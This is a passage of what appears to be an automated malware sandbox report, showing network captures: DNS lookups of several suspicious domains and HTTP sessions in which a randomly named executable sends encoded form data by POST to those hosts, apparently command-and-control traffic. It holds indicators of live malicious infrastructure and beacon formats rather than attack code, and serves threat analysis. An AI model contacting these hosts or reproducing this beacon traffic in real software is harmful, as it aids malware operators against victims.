Jan 11, 2025 05:06:00.394124031 CET	80	50001	104.21.48.1	192.168.2.7
Jan 11, 2025 05:06:00.394238949 CET	50001	80	192.168.2.7	104.21.48.1
Jan 11, 2025 05:06:00.403486013 CET	50001	80	192.168.2.7	104.21.48.1
Jan 11, 2025 05:06:00.411750078 CET	80	50001	104.21.48.1	192.168.2.7
Jan 11, 2025 05:06:39.656224966 CET	80	50001	104.21.48.1	192.168.2.7
Jan 11, 2025 05:06:39.656631947 CET	80	50001	104.21.48.1	192.168.2.7
Jan 11, 2025 05:06:39.656689882 CET	50001	80	192.168.2.7	104.21.48.1
Jan 11, 2025 05:06:39.659890890 CET	50001	80	192.168.2.7	104.21.48.1
Jan 11, 2025 05:06:39.664752960 CET	80	50001	104.21.48.1	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 05:04:27.440180063 CET	54673	53	192.168.2.7	1.1.1.1
Jan 11, 2025 05:04:27.451427937 CET	53	54673	1.1.1.1	192.168.2.7
Jan 11, 2025 05:04:44.947474957 CET	62694	53	192.168.2.7	1.1.1.1
Jan 11, 2025 05:04:44.969258070 CET	53	62694	1.1.1.1	192.168.2.7
Jan 11, 2025 05:04:58.103311062 CET	56249	53	192.168.2.7	1.1.1.1
Jan 11, 2025 05:04:58.120098114 CET	53	56249	1.1.1.1	192.168.2.7
Jan 11, 2025 05:05:11.431555033 CET	62974	53	192.168.2.7	1.1.1.1
Jan 11, 2025 05:05:11.915174007 CET	53	62974	1.1.1.1	192.168.2.7
Jan 11, 2025 05:05:25.728404999 CET	61431	53	192.168.2.7	1.1.1.1
Jan 11, 2025 05:05:25.742252111 CET	53	61431	1.1.1.1	192.168.2.7
Jan 11, 2025 05:05:39.010293961 CET	64120	53	192.168.2.7	1.1.1.1
Jan 11, 2025 05:05:39.196783066 CET	53	64120	1.1.1.1	192.168.2.7
Jan 11, 2025 05:05:52.729707003 CET	55770	53	192.168.2.7	1.1.1.1
Jan 11, 2025 05:05:52.741226912 CET	53	55770	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 05:04:27.440180063 CET	192.168.2.7	1.1.1.1	0xf0bd	Standard query (0)	www.comect.online	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:04:44.947474957 CET	192.168.2.7	1.1.1.1	0x822a	Standard query (0)	www.10000.space	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:04:58.103311062 CET	192.168.2.7	1.1.1.1	0x166c	Standard query (0)	www.creaturpace.xyz	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:05:11.431555033 CET	192.168.2.7	1.1.1.1	0x69d4	Standard query (0)	www.biumini.xyz	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:05:25.728404999 CET	192.168.2.7	1.1.1.1	0x30a7	Standard query (0)	www.rtpbnmax.shop	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:05:39.010293961 CET	192.168.2.7	1.1.1.1	0x2ed9	Standard query (0)	www.yxni.vip	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:05:52.729707003 CET	192.168.2.7	1.1.1.1	0x2e60	Standard query (0)	www.vilakodsiy.sbs	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 05:04:27.451427937 CET	1.1.1.1	192.168.2.7	0xf0bd	No error (0)	www.comect.online		124.6.61.130	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:04:44.969258070 CET	1.1.1.1	192.168.2.7	0x822a	No error (0)	www.10000.space		13.248.169.48	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:04:44.969258070 CET	1.1.1.1	192.168.2.7	0x822a	No error (0)	www.10000.space		76.223.54.146	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:04:58.120098114 CET	1.1.1.1	192.168.2.7	0x166c	No error (0)	www.creaturpace.xyz		209.74.79.42	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:05:11.915174007 CET	1.1.1.1	192.168.2.7	0x69d4	No error (0)	www.biumini.xyz	7cfc1312.limbocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 05:05:11.915174007 CET	1.1.1.1	192.168.2.7	0x69d4	No error (0)	7cfc1312.limbocdn.com	g30fc9e.cdn.limbocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 05:05:11.915174007 CET	1.1.1.1	192.168.2.7	0x69d4	No error (0)	g30fc9e.cdn.limbocdn.com		45.113.82.65	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:05:25.742252111 CET	1.1.1.1	192.168.2.7	0x30a7	No error (0)	www.rtpbnmax.shop	rtpbnmax.shop		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 05:05:25.742252111 CET	1.1.1.1	192.168.2.7	0x30a7	No error (0)	rtpbnmax.shop		67.223.118.94	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:05:39.196783066 CET	1.1.1.1	192.168.2.7	0x2ed9	No error (0)	www.yxni.vip		192.186.57.30	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:05:52.741226912 CET	1.1.1.1	192.168.2.7	0x2e60	No error (0)	www.vilakodsiy.sbs		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:05:52.741226912 CET	1.1.1.1	192.168.2.7	0x2e60	No error (0)	www.vilakodsiy.sbs		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:05:52.741226912 CET	1.1.1.1	192.168.2.7	0x2e60	No error (0)	www.vilakodsiy.sbs		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:05:52.741226912 CET	1.1.1.1	192.168.2.7	0x2e60	No error (0)	www.vilakodsiy.sbs		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:05:52.741226912 CET	1.1.1.1	192.168.2.7	0x2e60	No error (0)	www.vilakodsiy.sbs		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:05:52.741226912 CET	1.1.1.1	192.168.2.7	0x2e60	No error (0)	www.vilakodsiy.sbs		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:05:52.741226912 CET	1.1.1.1	192.168.2.7	0x2e60	No error (0)	www.vilakodsiy.sbs		104.21.112.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.comect.online

www.10000.space

www.creaturpace.xyz

www.biumini.xyz

www.rtpbnmax.shop

www.yxni.vip

www.vilakodsiy.sbs

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49975	124.6.61.130	80	1088	C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:04:27.472893953 CET	491	OUT	GET /cs7c/?FT=CdryMvIuRPhrhNp+O2hlvAXT+rMadDvfHxUD4gw+9ftZ82ygsyKDcDrn5TCIrgxbP6qLLp4j5uEJgTcnyoCHETCu03cQKbTqCiBrBkjQVvF/A9AiZwKEYph/IvS0e338ZMVaN10w+ZCw&LZXLP=uRtDln HTTP/1.1 Host: www.comect.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 810) like Gecko
Jan 11, 2025 05:04:29.895133018 CET	479	IN	HTTP/1.1 301 Moved Permanently Date: Sat, 11 Jan 2025 04:04:27 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: http://comect.online/cs7c/?FT=CdryMvIuRPhrhNp+O2hlvAXT+rMadDvfHxUD4gw+9ftZ82ygsyKDcDrn5TCIrgxbP6qLLp4j5uEJgTcnyoCHETCu03cQKbTqCiBrBkjQVvF/A9AiZwKEYph/IvS0e338ZMVaN10w+ZCw&LZXLP=uRtDln Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49977	13.248.169.48	80	1088	C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:04:44.991425037 CET	750	OUT	POST /3zfl/ HTTP/1.1 Host: www.10000.space Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Origin: http://www.10000.space Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 215 Connection: close Referer: http://www.10000.space/3zfl/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 810) like Gecko Data Raw: 46 54 3d 51 78 2b 58 6f 44 4d 46 2f 47 53 51 2b 33 65 72 2b 77 7a 2f 37 54 2b 2f 5a 6c 31 4d 41 5a 58 48 6b 53 31 77 52 2b 64 47 36 34 45 49 38 39 71 36 59 7a 4a 51 51 6e 2b 7a 4b 71 43 4a 4c 50 4b 51 35 32 70 4a 44 44 6a 6f 59 65 74 6b 69 75 68 61 2f 6b 45 79 76 31 54 46 70 38 42 68 30 6c 6f 73 46 32 61 42 31 46 36 7a 48 73 6e 41 4c 6e 66 6c 54 74 72 51 6a 59 56 4f 72 30 76 49 47 38 36 6e 68 67 69 6e 57 68 4b 46 6c 33 4a 71 66 54 56 6b 7a 48 67 67 30 76 65 78 41 7a 6a 58 76 66 74 39 68 4c 30 2f 61 5a 4a 7a 77 30 43 64 45 55 44 7a 65 73 62 68 73 69 6d 61 2b 6d 52 62 36 72 38 2b 65 65 6f 57 4f 61 46 4a 72 4f 36 45 74 70 6e 41 4b 41 3d 3d Data Ascii: FT=Qx+XoDMF/GSQ+3er+wz/7T+/Zl1MAZXHkS1wR+dG64EI89q6YzJQQn+zKqCJLPKQ52pJDDjoYetkiuha/kEyv1TFp8Bh0losF2aB1F6zHsnALnflTtrQjYVOr0vIG86nhginWhKFl3JqfTVkzHgg0vexAzjXvft9hL0/aZJzw0CdEUDzesbhsima+mRb6r8+eeoWOaFJrO6EtpnAKA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49978	13.248.169.48	80	1088	C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:04:47.544393063 CET	770	OUT	POST /3zfl/ HTTP/1.1 Host: www.10000.space Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Origin: http://www.10000.space Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 235 Connection: close Referer: http://www.10000.space/3zfl/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 810) like Gecko Data Raw: 46 54 3d 51 78 2b 58 6f 44 4d 46 2f 47 53 51 2b 57 75 72 2f 54 62 2f 39 7a 2b 2b 56 46 31 4d 61 70 58 44 6b 53 70 77 52 39 52 57 37 4b 51 49 79 38 61 36 5a 32 31 51 52 6e 2b 7a 45 4b 43 52 50 50 4c 63 35 32 6c 42 44 42 33 6f 59 61 46 6b 69 73 4a 61 2f 55 34 78 75 6c 53 6a 76 38 41 48 35 46 6f 73 46 32 61 42 31 46 2f 63 48 73 2f 41 4c 54 6a 6c 42 63 72 54 38 6f 56 4a 73 30 76 49 58 4d 36 5a 68 67 69 46 57 6a 75 76 6c 31 42 71 66 51 42 6b 7a 56 59 6a 74 2f 65 33 4f 54 69 70 2f 50 39 32 6f 36 45 30 55 50 42 4d 34 44 61 44 46 69 43 52 45 4f 58 4e 79 7a 65 68 36 6b 31 74 74 4e 68 4c 63 66 73 4f 44 34 78 6f 30 35 66 75 67 37 47 45 63 32 7a 6f 6d 6e 43 50 52 4d 6d 38 34 49 4d 66 53 32 51 62 35 42 59 3d Data Ascii: FT=Qx+XoDMF/GSQ+Wur/Tb/9z++VF1MapXDkSpwR9RW7KQIy8a6Z21QRn+zEKCRPPLc52lBDB3oYaFkisJa/U4xulSjv8AH5FosF2aB1F/cHs/ALTjlBcrT8oVJs0vIXM6ZhgiFWjuvl1BqfQBkzVYjt/e3OTip/P92o6E0UPBM4DaDFiCREOXNyzeh6k1ttNhLcfsOD4xo05fug7GEc2zomnCPRMm84IMfS2Qb5BY=
Jan 11, 2025 05:04:48.008999109 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49979	13.248.169.48	80	1088	C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:04:50.091137886 CET	1783	OUT	POST /3zfl/ HTTP/1.1 Host: www.10000.space Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Origin: http://www.10000.space Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1247 Connection: close Referer: http://www.10000.space/3zfl/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 810) like Gecko Data Raw: 46 54 3d 51 78 2b 58 6f 44 4d 46 2f 47 53 51 2b 57 75 72 2f 54 62 2f 39 7a 2b 2b 56 46 31 4d 61 70 58 44 6b 53 70 77 52 39 52 57 37 4b 6f 49 79 4b 4f 36 5a 56 64 51 44 58 2b 7a 61 61 43 53 50 50 4c 56 35 31 56 46 44 42 37 65 59 63 42 6b 69 50 78 61 35 6d 63 78 68 6c 53 6a 74 38 41 54 30 6c 6f 44 46 32 71 46 31 46 76 63 48 73 2f 41 4c 53 7a 6c 57 64 72 54 36 6f 56 4f 72 30 76 55 47 38 37 30 68 67 36 76 57 6a 71 56 6b 45 68 71 66 32 68 6b 78 6d 67 6a 6c 2f 65 31 4a 54 69 68 2f 50 77 75 6f 36 4a 4e 55 50 64 6d 34 45 2b 44 4a 48 54 37 54 71 48 4e 68 79 44 2f 7a 6d 34 4f 72 38 74 36 5a 70 39 30 46 72 5a 57 34 65 57 57 6a 6f 6e 4e 53 42 75 76 34 46 4f 44 61 76 4c 75 72 76 68 6e 49 6c 77 77 76 31 57 39 30 53 64 56 4e 59 2b 42 33 30 43 63 31 75 6b 55 31 78 64 78 6c 54 78 54 36 44 71 56 5a 4f 51 6b 54 72 31 30 5a 4c 4b 64 4a 74 7a 74 4f 58 43 53 6f 51 79 68 6f 45 70 64 2f 42 44 2b 63 6e 65 53 41 58 63 5a 57 61 70 49 56 43 6c 51 59 67 7a 39 7a 42 54 5a 5a 5a 57 34 4e 6f 65 4e 68 78 72 48 67 43 48 6f 46 44 2f [TRUNCATED] Data Ascii: FT=Qx+XoDMF/GSQ+Wur/Tb/9z++VF1MapXDkSpwR9RW7KoIyKO6ZVdQDX+zaaCSPPLV51VFDB7eYcBkiPxa5mcxhlSjt8AT0loDF2qF1FvcHs/ALSzlWdrT6oVOr0vUG870hg6vWjqVkEhqf2hkxmgjl/e1JTih/Pwuo6JNUPdm4E+DJHT7TqHNhyD/zm4Or8t6Zp90FrZW4eWWjonNSBuv4FODavLurvhnIlwwv1W90SdVNY+B30Cc1ukU1xdxlTxT6DqVZOQkTr10ZLKdJtztOXCSoQyhoEpd/BD+cneSAXcZWapIVClQYgz9zBTZZZW4NoeNhxrHgCHoFD/tIuF5h0Mx8tvxOEcMDPn5eYaOCb8mh2mJdeDbBsf6mB5dQQOUYzeI8jJH0zilXlW29pn8AVur4+Xlr+llQDvmB4VtwashID0svdG2aVMjm4zfgVuO5wQA7Amfu6tW8oRL0Z/YgvYkETRMfpFQG9JN0Rtyp9lyvmEg29O1Lz6bw+RakJ7OonBOCF91bRO/qjsFm3YjWOXkKWnhodF6fMe8nRF374kgjvZ7MfAEcb+1PD/7R0oU2acg7eCfHbTFnTgpqsQ1Dugeckp65eylsRbnFK2Jnnvra9WMy1d1OR91J74FsY7Y3ibP28jfZ/2C6e1He6cp1T/G+FJA/yzNgLndoauIv4XcsKcL5H+ojFhZcUqLBX702BFOEs/05y0ydr3SDJ+Lc5XFRLg8ZJ+++mMPs259qhc3pxyLM4osrjVBnibwnGorVluyz5dr65BiBoJD+r1kTz46cDZ+O/241d4s62fM20chyBR2JT/g0RHEXV2mUsT121NHOefdf4MJuIJIjr8sJvRegYLAz484iW1LrCgJLUR6LY5bka9BMPKjL95/nF05SPSney/QPk7L5TL3zufM7Hgfs9Q2jw0sQpD/M14kbHjBczLaNVcLNDYn6Pv98lUK2JoT7NN791DssZeleo3zzVGF9b/ewBzJQaTqirpJsb2fRfAGz [TRUNCATED]
Jan 11, 2025 05:04:50.545738935 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49981	13.248.169.48	80	1088	C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:04:52.632966995 CET	489	OUT	GET /3zfl/?FT=dzW3r0JajFi4yU+t5A3d9Cj0KGYHP6jpjSNWRO4j4rUaxvSRRHR1AwWhDoruFd3w8D11XAT8WPBX/+s6mj4ahUfcluh1giEyYW754F2hOtLVKwjjTtv3gq1pskTXS46vpAuqfW2BmGlQ&LZXLP=uRtDln HTTP/1.1 Host: www.10000.space Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 810) like Gecko
Jan 11, 2025 05:04:53.083744049 CET	392	IN	HTTP/1.1 200 OK content-type: text/html date: Sat, 11 Jan 2025 04:04:53 GMT content-length: 271 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 46 54 3d 64 7a 57 33 72 30 4a 61 6a 46 69 34 79 55 2b 74 35 41 33 64 39 43 6a 30 4b 47 59 48 50 36 6a 70 6a 53 4e 57 52 4f 34 6a 34 72 55 61 78 76 53 52 52 48 52 31 41 77 57 68 44 6f 72 75 46 64 33 77 38 44 31 31 58 41 54 38 57 50 42 58 2f 2b 73 36 6d 6a 34 61 68 55 66 63 6c 75 68 31 67 69 45 79 59 57 37 35 34 46 32 68 4f 74 4c 56 4b 77 6a 6a 54 74 76 33 67 71 31 70 73 6b 54 58 53 34 36 76 70 41 75 71 66 57 32 42 6d 47 6c 51 26 4c 5a 58 4c 50 3d 75 52 74 44 6c 6e 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?FT=dzW3r0JajFi4yU+t5A3d9Cj0KGYHP6jpjSNWRO4j4rUaxvSRRHR1AwWhDoruFd3w8D11XAT8WPBX/+s6mj4ahUfcluh1giEyYW754F2hOtLVKwjjTtv3gq1pskTXS46vpAuqfW2BmGlQ&LZXLP=uRtDln"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49982	209.74.79.42	80	1088	C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:04:58.146409035 CET	762	OUT	POST /iqne/ HTTP/1.1 Host: www.creaturpace.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Origin: http://www.creaturpace.xyz Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 215 Connection: close Referer: http://www.creaturpace.xyz/iqne/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 810) like Gecko Data Raw: 46 54 3d 59 68 61 72 69 4c 62 52 59 46 38 45 38 6a 56 67 6f 42 64 31 2f 35 69 78 66 4a 5a 4e 2f 38 66 2f 61 4d 48 64 6c 4c 32 68 68 33 43 31 49 72 57 52 53 52 66 52 6f 5a 43 7a 33 57 77 44 42 4e 42 76 49 30 6e 55 51 72 78 49 57 4c 4c 2f 6b 6d 2b 47 64 51 73 4b 5a 43 2f 79 32 76 66 70 75 54 50 47 68 6c 68 67 67 77 58 74 72 76 63 4c 76 47 38 4e 65 61 6e 30 48 7a 68 4c 66 61 35 6a 53 79 71 66 76 47 4d 4c 4b 6a 54 61 77 79 42 6d 30 45 75 5a 4e 70 45 79 41 5a 59 31 32 71 55 31 67 54 49 61 65 4f 65 4a 6f 77 36 77 6b 63 47 56 50 61 71 78 79 71 6f 35 75 45 72 48 69 6a 58 34 5a 2b 72 45 78 4d 4d 39 4c 65 51 35 52 5a 70 57 31 45 51 62 57 67 3d 3d Data Ascii: FT=YhariLbRYF8E8jVgoBd1/5ixfJZN/8f/aMHdlL2hh3C1IrWRSRfRoZCz3WwDBNBvI0nUQrxIWLL/km+GdQsKZC/y2vfpuTPGhlhggwXtrvcLvG8Nean0HzhLfa5jSyqfvGMLKjTawyBm0EuZNpEyAZY12qU1gTIaeOeJow6wkcGVPaqxyqo5uErHijX4Z+rExMM9LeQ5RZpW1EQbWg==
Jan 11, 2025 05:04:58.745940924 CET	533	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 04:04:58 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49983	209.74.79.42	80	1088	C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:05:00.707967997 CET	782	OUT	POST /iqne/ HTTP/1.1 Host: www.creaturpace.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Origin: http://www.creaturpace.xyz Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 235 Connection: close Referer: http://www.creaturpace.xyz/iqne/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 810) like Gecko Data Raw: 46 54 3d 59 68 61 72 69 4c 62 52 59 46 38 45 39 41 39 67 6b 43 46 31 35 5a 69 32 54 70 5a 4e 6c 4d 65 32 61 4d 4c 64 6c 4a 62 73 69 44 75 31 50 4a 65 52 54 55 7a 52 6b 35 43 7a 34 47 77 47 50 74 42 30 49 30 37 44 51 71 4e 49 57 50 6a 2f 6b 69 36 47 63 6a 55 56 59 53 2f 73 39 50 66 72 6a 7a 50 47 68 6c 68 67 67 7a 72 4c 72 76 45 4c 76 58 4d 4e 65 2f 62 33 45 7a 68 49 4f 61 35 6a 44 69 71 62 76 47 4d 35 4b 6e 62 38 77 30 46 6d 30 46 65 5a 4d 39 51 7a 4b 5a 59 2f 72 61 56 77 72 69 70 43 54 4f 4f 43 75 51 4b 2f 70 39 57 49 48 4d 72 54 6f 49 6b 56 77 56 54 38 6d 68 7a 4f 4f 59 32 78 7a 4e 49 6c 47 38 6b 59 4f 75 4d 38 34 57 78 66 41 66 6c 57 4d 54 6b 6a 78 2b 79 47 67 70 55 4c 68 37 52 52 48 79 38 3d Data Ascii: FT=YhariLbRYF8E9A9gkCF15Zi2TpZNlMe2aMLdlJbsiDu1PJeRTUzRk5Cz4GwGPtB0I07DQqNIWPj/ki6GcjUVYS/s9PfrjzPGhlhggzrLrvELvXMNe/b3EzhIOa5jDiqbvGM5Knb8w0Fm0FeZM9QzKZY/raVwripCTOOCuQK/p9WIHMrToIkVwVT8mhzOOY2xzNIlG8kYOuM84WxfAflWMTkjx+yGgpULh7RRHy8=
Jan 11, 2025 05:05:01.293032885 CET	533	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 04:05:01 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
